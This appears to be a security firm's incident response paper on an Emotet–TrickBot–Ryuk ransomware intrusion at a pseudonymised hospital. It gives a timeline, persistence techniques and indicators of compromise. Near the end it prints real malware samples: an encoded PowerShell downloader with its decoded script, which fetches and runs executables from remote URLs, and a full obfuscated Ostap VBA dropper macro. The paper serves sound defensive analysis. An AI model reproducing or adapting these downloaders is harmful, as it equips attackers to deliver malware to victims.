Vulnerability Found in Microsoft Exchange Server
A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time. ...
24/7/365 Monitoring & Alerting
Compromise Assessments
Threat Hunting
Vulnerability Management
CMMC Preparation & Assessment
Cybersecurity Assurance Readiness (CSAR®/RMF Pro)
ATO/RMF Support
If you are concerned about a potential threat or are experiencing a breach, contact our 24/7/365 emergency hotline at 888-860-0452.
Sign up to receive our biweekly newsletter that covers what's happening in cybersecurity including news, trends, and thought leadership.
At our core, Ingalls is a company that strives to be helpful to our clients while continuously innovating and evolving our technology and solutions. Since 2010, we have been dedicated to building a team and product that can stay steps ahead of threats, attacks, and vulnerabilities in an ever-changing landscape.
11 min read
Cyrus Robinson : May 6, 2020 12:00:00 AM
The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents.
In our newest Research Paper, we explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security.
The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents. In this paper, we will explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security (Ingalls). Victim organization and employee names have been changed to protect the identity of the organization that engaged Ingalls to respond. While not all components of the investigation are included in this paper, it does focus on the TTPs and Indicators of Compromise to provide understanding of the attack chain that similar organizations face on a daily basis.
Our investigation methodology is fairly straightforward: identify Indicators or Evidence of Compromise (IOCs and EOCs) via computer forensic evidence and search all available data records for additional evidence. Ingalls analyzed netflow logs as well as Endpoint Detection & Response (EDR) data from CylancePROTECT and Optics. In addition, Microsoft Exchange server logs, Windows event logs, and SQL server trace logs were also reviewed during this effort. IOCs were also searched on various Open Source Intelligence sources (OSINT) to gather additional insight.
Emotet is a banking trojan with the ability to self-propagate, first discovered by researchers in 2014. Emotet has been continually upgraded since then and it has been significantly improved. Emotet initially functioned as an information stealer, however today it’s customizable modules, popularity in Malware-as-a-Service (MaaS) operations, and ability to send information to and receive commands from Command and Control (C2) servers provide capabilities that are used by criminal groups to deliver other trojans, information stealers, and ransomware payloads. Initially, Emotet was sent as a malicious email attachment that leveraged Visual Basic macros to then execute obfuscated PowerShell scripts. It has also been deployed through other means recently, such as Remote Desktop Protocol (RDP) brute force attacks.
The TrickBot information stealer, first seen in 2016, is another common MaaS banking trojan. While TrickBot is sometimes spread independently via malicious emails, RDP brute force attacks, and drive-by downloads, it is often deployed as a secondary infection by other trojans such as Emotet. TrickBot is particularly effective at harvesting network credentials, computer credentials, website credentials from browsers, WiFi passwords, VPN credentials and configuration, and cryptocurrency wallet information, and, like Emotet, TrickBot has customizable modules, self-propagation capabilities, and the ability to communicate via C2 servers.
Ryuk, first seen in 2018, is a ransomware variant that intends to extort victims by encrypting their files and demanding a Bitcoin payment as ransom to decrypt the encrypted files. Ryuk is another component of the MaaS ecosystem and is frequently deployed by Emotet and TrickBot. It is believed that the Hermes banking trojan developers are also responsible for RYUK, and that this team is sponsored by North Korea.
Ostap is a Jscript trojan downloader. Similar to Emotet, it is often spread via VBA macros in malicious email attachments. Ostap has capabilities that include disabling antivirus or security software and propagating by copying itself to other documents accessible from a compromised host, including network shares. One key difference from Emotet is that Ostap uses JScript to infect a host rather than obfuscated PowerShell scripts. Ostap is commonly used to deploy other trojans including TrickBot.
Day 0 - 12:18:48 CST
Jane Buck, an employee at John Doe Memorial Hospital (JDMH), received a spearphishing email at their JDMH email address. The subject line of the email was "Jane Buck - JDMH”. The content of the message read “SOC report 01/16/2020" and was signed by “Fawn, Jill” and "Jill.Fawn@StagMedicalCenter.org”.
Figure 1 - Spearphishing Email
Jill Fawn is actually an employee at Stag Medical Center, another nearby hospital, but the actual address in the email "from" field was not Jill Fawn’s email address. Rather, the email actually came from saad.alam@ziaudinhospital.com, a known Emotet sender email address.
Figure 2 - Known Emotet Sender OSINT - https://pastebin.com/xFTyBF34
The email contained an attachment named “QZ-2572 Medical report p2.doc.” The email originated from an IP address of 181.113.134[.]226, an Ecuadorian IP address that is a VPN endpoint.
Figure 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/181.113.134.226/certificates
The ziauddinhospital.com email server did not have a PTR record configured to allow SMTP reverse DNS resolution, so their email server could be spoofed. In other words, ziauddinhospital.com did not actually resolve to 181.113.134[.]226. Rather, it should have resolved to 104.47.4.36.
Day 0 - 13:11:27 CST
Jane Buck opened the email attachment. The document in the email contained a VBA script ("Document_Open" which indicates: "Runs when the Word or Publisher document is opened") that launches a base64 encoded PowerShell script in a hidden window.
Figure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell Script
This script reaches out to download 796.exe from the following URLS:
The file 796.exe, an Emotet executable, is downloaded, named publishmsp.exe, and executed by the script. This file then downloads and installs the Emotet module, nonsensor.exe to the c:\windows\syswow64\ directory and installs nonsensor.exe as a service (HKLM\system\controlset001\services\nonsensor). The Emotet Service then established connectivity with the IP address 100.6.23[.]40, an active Emotet Epoch 2 command and control (C2) server. Once this foothold has been established, Emotet, TrickBot, and Ryuk begin deploying throughout JDMH's network environment. In addition to the initial infection files, the attackers also dropped several variants of Emotet, TrickBot, and Ryuk into JDMH's environment.
Once the attackers had access to the victim environment, they spent the next 24 hours staging their attack. After enumerating the victim network Emotet, TrickBot, and Ryuk were propagated to various locations on victim machines, including in C:\Users\Default\AppData\Roaming\WinNetCore\, C:\Users\Public\Junk\, C:\Windows\Temp\bdcore_tmp\, C:\ProgramData\, C:\Temp\, C:\Users\User\Public\, and the Recycling Bin (a common tactic malware uses to hide itself). Emotet and TrickBot are well known for the ability to propagate by enumerating network resources, brute forcing user accounts, and writing to shared drives. One of the novel methods used to propagate the malicious payloads in JDMH's environment was via Active Directory startup, shutdown, logon, and logoff Group Policy scripts.
Deploying via Active Directory Group Policy scripts was likely intended as both a propagation method as well as a persistence mechanism. However, quick actions in isolating infected devices and restoring servers from clean backups prevented the attackers from being able to rely on this as an ongoing persistence mechanism.
Figure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence Mechanism
The attackers also used scheduled tasks to achieve persistence. Specifically, they created a scheduled task named “Windows Net Core” on compromised machines to re-infect with TrickBot and scheduled tasks named “comp_sys”, “comp_sys.h”, “user_userlogon” and “user_userlogon_h” on compromised machines to re-infect with Emotet.
Another, more complicated persistence mechanism was also demonstrated in the attack. JDMH used BitDefender Endpoint Security, deployed via a remote management and monitoring (RMM) tool, to secure their endpoints from malware. Unfortunately, BitDefender was unable to prevent Emotet, TrickBot, or Ryuk from infecting the environment. To make matters worse, the attackers exploited CVE-2019-17099, a vulnerability in BitDefender Endpoint Security versions 9.6.11.163 and prior, to perform a DLL hijack in order to achieve persistence. This vulnerability allows an attacker to load an arbitrary DLL file from the search path, re-infecting compromised computers with Ryuk. Cylance Optics provided insight into the RYUK detections and showed that the RYUK encryptor file was being reloaded on victim machines every time the EPSecurityService.exe service was executed.
Figure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence Mechanism
Day 1 - Shortly after 13:00:00 CST
The attackers begin infecting computers with Ryuk Ransomware. JDMH IT contacted their managed service provider (MSP) for assistance. JDMH's MSP immediately began taking efforts to isolate infected devices, gathering information to establish the scope of the ransomware infection, and bringing up backups of infected servers. Ryuk deleted Volume Shadow data and disabled the Volume Shadow Service on infected computers. The ryukreadme.html file gave the email address to contact the attackers as orfhissipmay1970@protonmail[.]com.
Beginning at 11:25 CST, a JDMH user's credentials were used to send 3 emails from 37.221.113[.]166, a datacenter IP address in England. These credentials were presumably harvested by TrickBot during the initial attack, and either as a second attempt to infect JDMH's environment or possibly purchased on a Dark Web forum and used by a different attacker. The victim had not yet completed a global password reset, which meant that the attacker could use this account to gain access to the Cloud-based email service. This secondary infection attempt underscores the importance and urgency of a timely global password reset following a credential harvesting or information stealing attack.
These emails were sent to a JDMH group email account, a JDMH distribution list of all department managers, and a JDMH distribution list of all JDMH users. The subject of the first email was "Notification statement for written contract No.30449", and the body of the email claimed that the recipient had "missed obligatory compensation for 1481.67 US Dollars date" and contained a malicious document named "cl_inf_HC_163_86818.doc". The subject of the second email was "Second claim for written contract No.64312", and the body of the email claimed that the recipient had "dropped obligatory payment for 3152.98 US Dollars date" and contained a malicious document named "paym_req_EC_642_77095.doc". The subject of the third email was "Resended claim for contract No.81253", and the body of the email claimed that the recipient had "missed obligatory compensation for 1255.43 US Dollars date" and contained a malicious document named "iss_cont_DT_174_23992.doc.”
Figure 7 - Secondary Infection Attempt 1
Figure 8 - Secondary Infection Attempt 2
Figure 9 - Secondary Infection Attempt 3
All three malicious documents contain Ostap malware, using the same malicious VBA macro which loads a malicious javascript file named "Dsaow.GaerIok.jse". If the Ostap file fails to download its payload, it attempts to replace other office documents on attached drives and network shares with itself. The macro, when run from Microsoft Word 2010 does not fully execute, but when run from Microsoft Word 2016, infects the host with TrickBot. The file then contacts ipecho.net (probably to check the victim's external IP address), cbl.abuseat.org, and zen.spamhaus.org. It also attempts to connect to hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php to inform the attacker about the victim computer's name, user name, IP address, and network adapter information. 185.180.199[.]77 is a known Ostap and TrickBot host located in Netherlands. The TrickBot malware then attempts to establish connectivity with and download the systeminfo, msconfig, and pwgrab modules from one of the following C2 servers:
Fortunately, JDMH's environment was successfully contained, and JDMH IT staff quickly noticed and responded to the emails, securing the compromised account, and informing users not to open the email if they received it
A list of JDMH computer names and user credentials were found for sale in a Dark Web forum. These were likely the result of TrickBot harvesting credentials within the environment. Fortunately, these were outdated computer names and credentials that had been subject to a global password reset during remediation efforts. While JDMH has taken steps to further secure their environment with a defense in depth approach, the attackers still persist in their efforts to extort money through ransomware attacks.
JDMH received a thorough report detailing the timeline of the attach and analysis of malicious files and activity within their environment. This report was briefed to their IT staff, MSP representatives, executive leadership, and legal counsel. Ingalls provided JDMH with recommendations for thoroughly eradicating malware and persistence mechanisms and securing their IT environment and user accounts. JDMH also signed up for Ingalls' Managed Detection and Response (MDR) service as an ongoing component of their defense in depth strategy. Doing so was simple because Ingalls had already deployed their MDR hardware and software into JDMH's environment for the incident response efforts.
53518AF93CAE115B68AF828E50CD70884E203FBFBD46C9631F7D65CB3F74251F
11B42BA8093CD242D37C111A2DFA37311EB5CA77BC8DD118A952088D5716EC15
7DC18BF00ADEF10775C2A73515B7644EF6C26DB0006CAC82536934DE86D03E6F
C6B5DFAE20D0777716DF85C66F3FACB0223B18913169B61A1D9A0D249CCBCA7A
BE403CE2D14F38B66528D438457927218F1AA44A68530BF46B2703DA75DCC8BD
DD1BD34A80DB022CACFDD11EE676FDA7BE9065DF14D8084B6029DB56283DEE79
1328DD556749D061CD4468BF907591FDE215C7B6F1755BBA566D9C335E479EFB
EB7033650DCCB5FA8EC43DA571A44AF46F487ED084FDE6272DE011ABEF54AE00
05A14271A14004BF89D8B4DBED8E876A0A182BD98864BEDC86D824647D9D5810
FA582803942B20C584CE8F353B56D65EF034FC6A70B6E41B07EAAF703E558AC5
BD26B6792D6C6D14D5E7CE1128C4B00095BD3FF265FDD8E5B187FDAA07369D16
05903B62D309D5B4C04C7C6865B1711CD9E4E6370D4DBF419B1611FF17C7A112
FF31DFFDEAF53A96EB28717FAF0CCCDD6B1FFD757310A99092295C486275AD67
0D612A370FBDAAEAC7527DDFE1F7F0680FA54DD23807C34654537B8E390E552E
6494234E7B028CF86A6A1DE8B5352CA818C7E145ADF6FE38F9E6533358DA7C8F
096ADEAA15C1BBBE3723921796B51F7DECB9F6F90AAD03609D938D969B583C17
08BC5BBE5AFF4C6DFC879FD837AAA7A38E6325FA6082093212289F56C5EA1CF8
781290FBF153C565F31321C36E634E892AE5373A8B0D5494315B196992C99D5A
B983018C45B1D8095BE9F34EEB9E893537656FE21F5F5E66EFBB3A9D855D2343
2792E0D21318DC8918A9906A5E2B5B52AE8F756870EB96DD4D2DB48FD7B88548
31AFE5312E444E707420703745390F18FC2B854A0961EA3961BC1AA31CD6FA50
CAB2D2903DE9A3FEACF2004A81AC68D4C73B4C31CD5B864F48ACA3AB383893A1
2B85419B0DD19A806F01176E3ED3C96B451BD2E915B35209A0237D0D5569B890
DD23E2A9B6679E3FE85755DF3CFEC9CC25C3A5945C21E7FF2FE719D23C68D2BA
F5665EF7D190E78F5F90C92D0406E58530030FC67366D38D73EEADC6EE69AA51
6E3DDE8C5D05DE1CE2A6588460AE4053A438AE5E66A87ED643A8A23CB6C4CDAB
8BD68AF164920B11B1CEBFE82400E077E34E88528357A8690F37DF969C8D719D
E8629541F510A7A5792B112A080B5BE2F3E88F6DC30169875D7F6B5DE2EB16DC
CD91E03069136BAC09B18D685CD1F9B948EEA96DA64A8BC9E2DAA3A6A44CA81F
193.26.217[.]243:443
5.2.78[.]70:443
5.34.177[.]40:443
5.2.78[.]77:443
185.186.77[.]222:443
185.65.202[.]240:443
188.227.84[.]209:443
185.45.193[.]76:443
181.129.104[.]139:449
107.172.165[.]149:443
181.112.157[.]42:449
181.140.173[.]186:449
45.148.120[.]14:443
170.84.78[.]224:449
46.174.235[.]36:449
82.146.62[.]52:443
64.44.51[.]125:443
185.11.146[.]86:443
5.182.210[.]226:443
945.148.120[.]14:443
46.229.213[.]27:443
200.21.51[.]38:449
51.254.164[.]240:443
45.148.120[.]13:443
190.214.13[.]2:449
36.89.85[.]103:449
181.129.134[.]18:449
186.71.150[.]23:449
181.113.28[.]146:449
88.99.112[.]87:443
164.68.120[.]56:443
951.254.164[.]240:443
988.99.112[.]87:443
81.177.180[.]254:443
200.127.121[.]99:449
121.100.19[.]18:449
119.252.165[.]75:449
186.232.91[.]240:449
131.161.253[.]190:449
181.196.207[.]202:449
114.8.133[.]71:449
202.29.215[.]114:449
171.100.142[.]238:449
180.180.216[.]177:449
181.113.134[.]226
46.4.213[.]201
194.5.188[.]11
47.245.59[.]74
45.124.87[.]127
104.18.58[.]143
100.6.23[.]40
185.180.199[.]77
92.63.98[.]59
82.146.62[.]52
2cdajlnnwxfylth4[.]onion
hxxp://ajhmanamlak[.]com/wp-content/rcz9/
hxxp://maphagroup[.]com/wp-admin/mtq
hxxp://www.meggie-jp[.]com/images/Tznj
hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6
hxxps://nnjastudio[.]com/wp-admin/xHjsw
hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php
saad.alam@ziaudinhospital[.]com
orfhissipmay1970@protonmail[.]com
QZ-2572 Medical report p2.doc
Powershell -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQAnADsAJABJAGIAbAB1AHEAagB4AG4AdgBvAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEQAYwBkAHgAcwBqAGQAbgBiAGUAKwAnAC4AZQB4AGUAJwA7ACQAUgBpAGgAcgBqAHoAZwBpAHEAZABxAHcAZAA9ACcASgBtAGcAZQB3AGYAaAB2AG4AbABmACcAOwAkAFoAZwBrAHYAaABoAG0AYwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQATgB2AGMAdwBvAG4AYwB6AGMAZQB5AGMAbgA9ACcAaAB0AHQAcAA6AC8ALwBhAGoAaABtAGEAbgBhAG0AbABhAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAGMAegA5AC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGgAYQBnAHIAbwB1AHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG0AdABxAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBlAGcAZwBpAGUALQBqAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AVAB6AG4AagAvACoAaAB0AHQAcAA6AC8ALwBnAGkAYQB0AGwAYQBsAGEAbwBjAGEAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AWQB6ADkAOABTAFcAWQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAG4AagBhAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AEgAagBzAHcALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUwB6AHYAbwBtAGEAdwB3AD0AJwBOAGoAZgBqAHQAdgBjAGIAbABmAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAZgBpAGEAeQBhAG4AeABoAHkAbwB4ACAAaQBuACAAJABOAHYAYwB3AG8AbgBjAHoAYwBlAHkAYwBuACkAewB0AHIAeQB7ACQAWgBnAGsAdgBoAGgAbQBjAC4AIgBEAG8AVwBuAEwAYABPAGAAQQBkAEYASQBsAGUAIgAoACQAVQBmAGkAYQB5AGEAbgB4AGgAeQBvAHgALAAgACQASQBiAGwAdQBxAGoAeABuAHYAbwB4ACkAOwAkAFMAbABzAHEAagBuAHUAZgBkAGUAZgBwAHIAPQAnAEoAYwBlAHIAcAB4AHMAdgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAYgBsAHUAcQBqAHgAbgB2AG8AeAApAC4AIgBMAGUATgBgAGcAVABIACIAIAAtAGcAZQAgADMAMwAxADEAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAQQBgAFIAdAAiACgAJABJAGIAbAB1AHEAagB4AG4AdgBvAHgAKQA7ACQAWgBrAGsAdQBwAG0AZABjAGMAYwB1AD0AJwBJAHoAagBrAGYAegB0AGMAbgBhAHIAJwA7AGIAcgBlAGEAawA7ACQAVwB6AGEAYQBxAGIAdQB1AD0AJwBWAGkAbwB0AGwAbwBmAHoAcABzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAbgBpAHEAcgBjAG0AbABqAD0AJwBPAHAAZQBjAGMAbABzAHAAcwB1ACcA
This Base64 string decodes as:
$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')
cl_inf_HC_163_86818.doc, paym_req_EC_642_77095. doc, and iss_cont_DT_174_23992.doc VBA Code
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Moon, 0, 0, MSTSCLib, MsRdpClient8NotSafeForScripting"
Private Kirfool As String
Sub RePac()
If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
End Sub
Private Function Herdio(i As String) As String
Herdio = Replace(i, "a", "")
End Function
Function Mulent(parr As Variant, psiz As Integer, pbl As Integer, prow As Integer, pcol As Integer, pbit As Integer, dc As Long) As Boolean
Dim ix%, va%, r%, c%, s%
r = prow
c = pcol
If psiz > 0 Then
s = psiz / pbl
If r < 0 Then
r = r + psiz
c = c + 4 - ((psiz + 4) Mod 8)
End If
If c < 0 Then
c = c + psiz
r = r + 4 - ((psiz + 4) Mod 8)
End If
If c >= psiz Then
c = c - psiz
r = r + 1
End If
r = r + (Int(r / s) * 2)
c = c + (Int(c / s) * 2)
End If
Mulent = False
r = r + 2
c = c + 2
ix = r * 20 + Int(c / 8) ' 20 bytes per row
If ix > 5 Or ix < 0 Then GoTo Dro
' c = 2^(7 - (c MOD 8))
c = 2 ^ (c Mod 8)
va = parr(0, ix)
If psiz > 0 Then
If (Int(va / c) Mod 2) = 0 Then
If pbit < 0 Then
Mulent = True
GoTo Dro
End If
parr(0, ix) = va + c
Else
GoTo Dro
End If
End If
If pbit > 0 Then
va = parr(1, ix)
If (Int(va / c) Mod 2) = 0 Then va = va + c ' else va = va - c
parr(1, ix) = va
End If
Dro:
Kirfool = """" + Kirfool + """"
ActiveDocument.TrackRevisions = CallByName(CreateObject(Herdio("WaSacripata.Sahelala")), Herdio("Ruana"), (dc - dc) + 1, Kirfool, (dc - dc) + 1)
Mulent = True
End Function
Private Function Molert(i As String) As String
Molert = Replace(i, "y", "")
End Function
Private Sub Branolp()
Dim butilop As String
Dim xShape As Shape, xBkgr As Shape
Dim xAddr As String
Dim xPosOldX As Double, xPosOldY As Double
Dim xSizeOldW As Double, xSizeOldH As Double
butilop = Me.Content.Text
Kirfool = Application.StartupPath & Herdio(Molert("yo\.aay.\a.y.\yya")) & Molert("Dsaoyyyw.GayyyerIok.")
Dim Ikolpppp7 As Integer
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Ikolpppp7 = FreeFile
Open Kirfool For Binary Lock Read Write As #Ikolpppp7
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Put #Ikolpppp7, , butilop
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Close #Ikolpppp7
FileCopy Kirfool, Kirfool & Molert("yjysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Kill Kirfool
Kirfool = Kirfool & Molert("yjyysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
End Sub
Private Sub Moon_OnDisconnected(ByVal discReason As Long)
RePac
Branolp
If (Mulent(Array(7, 8, 6), 0, 0, 0, 0, 0, discReason)) Then
Me.Close
End If
End Sub
Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)
Debug.Print "to hui"
End Sub
About the Author
Cyrus Robinson, CISSP, MCSE, MCITP, CEH, CHFI, Sec+
Mr. Robinson is a skilled Information Security professional with experience working with diversified technologies and environments. Mr. Robinson’s professional IT career began as an electronic forensics engineer as an active duty Airman with primary responsibilities with testing and evaluating digital forensic software, policies, and procedures. In this capacity, he worked alongside federal investigators and various DoD, CIA, FBI, NSA, and NIST employees. Following his active duty role with the USAF, Mr. Robinson went on to work in change management and system administration as a DoD Contractor. Mr. Robinson also has extensive experience in the roles of Information Security Officer and IT Director for a large medical group which contribute to his knowledge with security risk assessments, HIPAA compliance, and drafting and implementing corporate IT security and business continuity policies. Mr. Robinson holds various industry standard certifications and a Masters of Science in Information Security and Assurance.
|
A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time. ...
1 min read
An employee calls the helpdesk saying that they can’t access their files, and there’s a note on the screen saying to email the attacker to send...
A buffer overflow vulnerability in SonicOS could allow a remote attacker to cause a Denial of Service (DoS) by sending a specially crafted request to...